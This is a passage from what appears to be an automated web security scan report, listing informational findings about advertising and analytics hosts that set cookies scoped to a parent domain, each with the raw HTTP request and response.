Set-Cookie: eng=1_1315135391_34024:31793; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: scg=1_1315135391; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: afl=1_1315135391; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sun, 04 Sep 2011 11:23:11 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Location: http://pixel.fetchback.com/serve/fb/optoutverification
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 0


15.104. http://pixel.quantserve.com/optout_set  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /optout_set

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /optout_set?s=nai&nocache=0.6965706 HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4e5e6725-891ad-f8693-5137e; d=EG8BIgHQB4FQCa0Wu-EYIIvxC6pQ

Response

HTTP/1.1 302 Found
Connection: close
Set-Cookie: qoo=OPT_OUT; expires=Wed, 01-Sep-2021 11:15:12 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Location: /optout_verify?s=nai&nocache=0.6965706
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Sun, 04 Sep 2011 11:15:12 GMT
Server: QS


15.105. http://pixel.rubiconproject.com/tap.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=7259&nid=2211&put=4612741554684080402&expires=1 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=4642/5271
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; csi2=3214995.js^2^1315096957^1315097051; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1; rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C0%2C1%2C%2C; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; nus_2046=0.00; ses2=5032^2&9346^1; ruid=154e62c97432177b6a4bcd01^2^1315103145^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=4642/5271; rdk15=0; ses15=5032^2&9346^1&5271^1; csi15=3215715.js^1^1315103145^1315103145&3214998.js^1^1315097284^1315097284&3203911.js^1^1315097079^1315097079

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:25:48 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1; expires=Tue, 04-Oct-2011 02:25:48 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C0%2C1%2C%2C%267259%3D14658%2C0%2C1%2C%2C; expires=Tue, 04-Oct-2011 02:25:48 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_2211=4612741554684080402; expires=Mon, 05-Sep-2011 02:25:48 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

15.106. http://pixel.rubiconproject.com/tap.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=4894&nid=1986&put=6422714091563403120&expires=30 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=4642/5271
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; csi2=3214995.js^2^1315096957^1315097051; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1; rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C0%2C1%2C%2C; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; nus_2046=0.00; ses2=5032^2&9346^1; ruid=154e62c97432177b6a4bcd01^2^1315103145^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=4642/5271; rdk15=0; ses15=5032^2&9346^1&5271^1; csi15=3215715.js^1^1315103145^1315103145&3214998.js^1^1315097284^1315097284&3203911.js^1^1315097079^1315097079

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:41:19 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7249%3D1%262876%3D1%264212%3D1%264940%3D1%265364%3D1%265421%3D1%267203%3D1%262827%3D1%266045%3D1%265085%3D1%267911%3D1%264894%3D1; expires=Tue, 04-Oct-2011 02:41:19 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=4212%3D14009%2C182%2C2%2C%2C%267249%3D14009%2C0%2C1%2C%2C%262876%3D14126%2C0%2C1%2C%2C%265364%3D14130%2C183%2C2%2C%2C%265421%3D14148%2C510%2C4%2C%2C%264940%3D14297%2C0%2C1%2C%2C%267203%3D14309%2C349%2C2%2C%2C%262827%3D14309%2C349%2C2%2C%2C%266045%3D14309%2C349%2C2%2C%2C%265085%3D14658%2C0%2C1%2C%2C%267911%3D14658%2C0%2C1%2C%2C%264894%3D14658%2C0%2C1%2C%2C; expires=Tue, 04-Oct-2011 02:41:19 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_1986=6422714091563403120; expires=Tue, 04-Oct-2011 02:41:19 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

15.107. http://pixel.rubiconproject.com/tap.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=4210&nid=1523&put=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F&expires=10 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=4642/5271
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; csi2=3214995.js^2^1315096957^1315097051; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1; rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C0%2C1%2C%2C; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; nus_2046=0.00; ses2=5032^2&9346^1; ruid=154e62c97432177b6a4bcd01^2^1315103145^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=4642/5271; rdk15=0; ses15=5032^2&9346^1&5271^1; csi15=3215715.js^1^1315103145^1315103145&3214998.js^1^1315097284^1315097284&3203911.js^1^1315097079^1315097079

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:25:47 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1; expires=Tue, 04-Oct-2011 02:25:47 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C2%2C2%2C%2C; expires=Tue, 04-Oct-2011 02:25:47 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; expires=Wed, 14-Sep-2011 02:25:47 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

15.108. http://pixel.rubiconproject.com/tap.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=7249&nid=2146&put=n4tx19dbice3prpg7887b1ymgzfc6iit&expires=30 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://uac.advertising.com/wrapper/aceUACping.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; csi2=3214995.js^2^1315096957^1315097051; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; nus_2046=0.00; ses2=5032^2&9346^1; ruid=154e62c97432177b6a4bcd01^2^1315103145^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses15=5032^2&9346^1&5271^1; csi15=3215715.js^1^1315103145^1315103145&3214998.js^1^1315097284^1315097284&3203911.js^1^1315097079^1315097079; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1; rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C0%2C1%2C%2C%267259%3D14658%2C0%2C1%2C%2C; put_2211=4612741554684080402

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:07:11 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264894%3D1%267249%3D1; expires=Tue, 04-Oct-2011 03:07:11 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C0%2C1%2C%2C%5D%5D%3E%3E%264894%3D14658%2C0%2C304%2C%2C%267249%3D14659%2C0%2C1%2C%2C; expires=Tue, 04-Oct-2011 03:07:11 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; expires=Tue, 04-Oct-2011 03:07:11 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

15.109. http://pixel.rubiconproject.com/tap.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=5421&nid=2054&put=6731d4ad-7dae-4402-b507-a0bc233d79fb&expires=30 HTTP/1.1
Host: pixel.rubiconproject.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dis.sv.us.criteo.com/dis/dis.aspx?pu=1174&cb=eefb80330c
Cookie: rpb=7249%3D1%262876%3D1%264212%3D1%264940%3D1%265421%3D1%267203%3D1%262827%3D1%266045%3D1%265364%3D1; rpx=4212%3D14009%2C182%2C2%2C%2C%267249%3D14009%2C0%2C1%2C%2C%262876%3D14126%2C0%2C1%2C%2C%265364%3D14130%2C183%2C2%2C%2C%265421%3D14148%2C161%2C3%2C%2C%264940%3D14297%2C0%2C1%2C%2C%267203%3D14309%2C0%2C1%2C%2C%262827%3D14309%2C0%2C1%2C%2C%266045%3D14309%2C0%2C1%2C%2C; put_1185=9033442320916087634; put_2146=be87drgxhtfzsrxhqyctzbxiopqjem1y; put_2046=WX9qZVd2TXVEBmNeAQZyXAJQaXsQdAFBDFlpVVFOYA%3D%3D; put_2054=6731d4ad-7dae-4402-b507-a0bc233d79fb; put_1994=gl99ih0j0xqn

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:59:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267249%3D1%265421%3D1; expires=Tue, 04-Oct-2011 03:59:00 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C0%2C1%2C%2C%267259%3D14658%2C0%2C1%2C%2C%5D%5D%3E%3E%267249%3D14659%2C0%2C103%2C%2C%265421%3D14659%2C0%2C1%2C%2C; expires=Tue, 04-Oct-2011 03:59:00 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_2054=6731d4ad-7dae-4402-b507-a0bc233d79fb; expires=Tue, 04-Oct-2011 03:59:00 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

15.110. http://pixel.traveladvertising.com/Live/Pixel.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.traveladvertising.com
Path:   /Live/Pixel.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Live/Pixel.aspx?PlacementId=49600 HTTP/1.1
Host: pixel.traveladvertising.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dis.sv.us.criteo.com/dis/dis.aspx?pu=1174&cb=eefb80330c
Cookie: tan_rt_49602=49602; CookieId=a91131c07f69440bb20ad255c280721b; tan_rt_49600=49600

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: image/gif
Expires: Sun, 04 Sep 2011 03:59:36 GMT
Last-Modified: Sun, 04 Sep 2011 03:59:36 GMT
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: tan_rt_49600=49600;Path=/;Domain=.traveladvertising.com;Expires=Tue, 04-Oct-2011 03:59:36 GMT
Set-Cookie: CookieId=a91131c07f69440bb20ad255c280721b;Path=/;Domain=.traveladvertising.com;Expires=Sat, 29-May-2060 03:59:36 GMT
Content-Length: 43
Connection: keep-alive

GIF89a.............!.......,...........L..;

15.111. http://plg3.yumenetworks.com/dynamic_preroll_playlist.vast2xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://plg3.yumenetworks.com
Path:   /dynamic_preroll_playlist.vast2xml

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dynamic_preroll_playlist.vast2xml?domain=459ZHfrwnWO HTTP/1.1
Host: plg3.yumenetworks.com
Proxy-Connection: keep-alive
Referer: http://static.eplayer.performgroup.com/ptvFlash/eplayer2/Eplayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ymbt=0rO0ABXcQAAAAAQAAAQQAAAU7AAAAAA**

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:18:56 GMT
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Set-Cookie: ymbt=0rO0ABXcQAAAAAQAAAQQAAAU7AAAFPg**; Domain=.yumenetworks.com; Expires=Tue, 03-Sep-2013 03:18:56 GMT; Path=/
Set-Cookie: ymdt=0rO0ABXcSAAAFPgAAAAAAAAAAAAA_AAAA; Domain=.yumenetworks.com; Expires=Fri, 14-Oct-2011 03:18:56 GMT; Path=/
Ypp: @YD_1;1223_0
Set-Cookie: ymf=null; Domain=.yumenetworks.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ymvw=50_23_123_106_0VzmEGyAz89Iy4; Domain=.yumenetworks.com; Expires=Tue, 13-Dec-2011 03:18:56 GMT; Path=/
Content-Type: text/xml
Content-Length: 73
P3P: policyref="http://ads.yumenetworks.com/P3P/PolicyReferences.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<VAST version="2.0">

</VAST>


15.112. http://premiumtv.122.2o7.net/b/ss/premiumtveplayerUS/0/FAS-3.1.2-AS3/s82023671451024  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://premiumtv.122.2o7.net
Path:   /b/ss/premiumtveplayerUS/0/FAS-3.1.2-AS3/s82023671451024

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/premiumtveplayerUS/0/FAS-3.1.2-AS3/s82023671451024 HTTP/1.1
Host: premiumtv.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 04:18:09 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_bx60wx7Fx7Bgx7Ffdwbx7Eskwx60ga=[CS]v4|0-0|4E62FC01[CE]; Expires=Fri, 2 Sep 2016 04:18:09 GMT; Domain=.2o7.net; Path=/
Location: http://premiumtv.122.2o7.net/b/ss/premiumtveplayerUS/0/FAS-3.1.2-AS3/s82023671451024?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Sat, 03 Sep 2011 04:18:09 GMT
Last-Modified: Mon, 05 Sep 2011 04:18:09 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www325
Content-Length: 0
Content-Type: text/plain
Connection: close


15.113. http://premiumtv.122.2o7.net/b/ss/premiumtveplayerUS/0/FAS-3.1.2-AS3/s85326054897159  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://premiumtv.122.2o7.net
Path:   /b/ss/premiumtveplayerUS/0/FAS-3.1.2-AS3/s85326054897159

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/premiumtveplayerUS/0/FAS-3.1.2-AS3/s85326054897159 HTTP/1.1
Host: premiumtv.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 04:18:10 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_bx60wx7Fx7Bgx7Ffdwbx7Eskwx60ga=[CS]v4|0-0|4E62FC02[CE]; Expires=Fri, 2 Sep 2016 04:18:10 GMT; Domain=.2o7.net; Path=/
Location: http://premiumtv.122.2o7.net/b/ss/premiumtveplayerUS/0/FAS-3.1.2-AS3/s85326054897159?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Sat, 03 Sep 2011 04:18:10 GMT
Last-Modified: Mon, 05 Sep 2011 04:18:10 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www379
Content-Length: 0
Content-Type: text/plain
Connection: close


15.114. http://premiumtv.122.2o7.net/b/ss/premiumtveplayerUS/0/FAS-3.1.2-AS3/s8630611889064  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://premiumtv.122.2o7.net
Path:   /b/ss/premiumtveplayerUS/0/FAS-3.1.2-AS3/s8630611889064

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/premiumtveplayerUS/0/FAS-3.1.2-AS3/s8630611889064 HTTP/1.1
Host: premiumtv.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 04:18:08 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_bx60wx7Fx7Bgx7Ffdwbx7Eskwx60ga=[CS]v4|0-0|4E62FC00[CE]; Expires=Fri, 2 Sep 2016 04:18:08 GMT; Domain=.2o7.net; Path=/
Location: http://premiumtv.122.2o7.net/b/ss/premiumtveplayerUS/0/FAS-3.1.2-AS3/s8630611889064?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Sat, 03 Sep 2011 04:18:08 GMT
Last-Modified: Mon, 05 Sep 2011 04:18:08 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www298
Content-Length: 0
Content-Type: text/plain
Connection: close


15.115. http://premiumtv.122.2o7.net/b/ss/premiumtveplayerUS/0/FAS-3.1.2-AS3/s88864460214972  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://premiumtv.122.2o7.net
Path:   /b/ss/premiumtveplayerUS/0/FAS-3.1.2-AS3/s88864460214972

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/premiumtveplayerUS/0/FAS-3.1.2-AS3/s88864460214972 HTTP/1.1
Host: premiumtv.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 04:18:08 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_bx60wx7Fx7Bgx7Ffdwbx7Eskwx60ga=[CS]v4|0-0|4E62FC00[CE]; Expires=Fri, 2 Sep 2016 04:18:08 GMT; Domain=.2o7.net; Path=/
Location: http://premiumtv.122.2o7.net/b/ss/premiumtveplayerUS/0/FAS-3.1.2-AS3/s88864460214972?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Sat, 03 Sep 2011 04:18:08 GMT
Last-Modified: Mon, 05 Sep 2011 04:18:08 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www282
Content-Length: 0
Content-Type: text/plain
Connection: close


15.116. http://premiumtv.122.2o7.net/b/ss/premiumtveplayerUS/0/FAS-3.1.2-AS3/s88942754534073  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://premiumtv.122.2o7.net
Path:   /b/ss/premiumtveplayerUS/0/FAS-3.1.2-AS3/s88942754534073

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/premiumtveplayerUS/0/FAS-3.1.2-AS3/s88942754534073 HTTP/1.1
Host: premiumtv.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 04:18:10 GMT
Server: Omniture DC/2.0.0
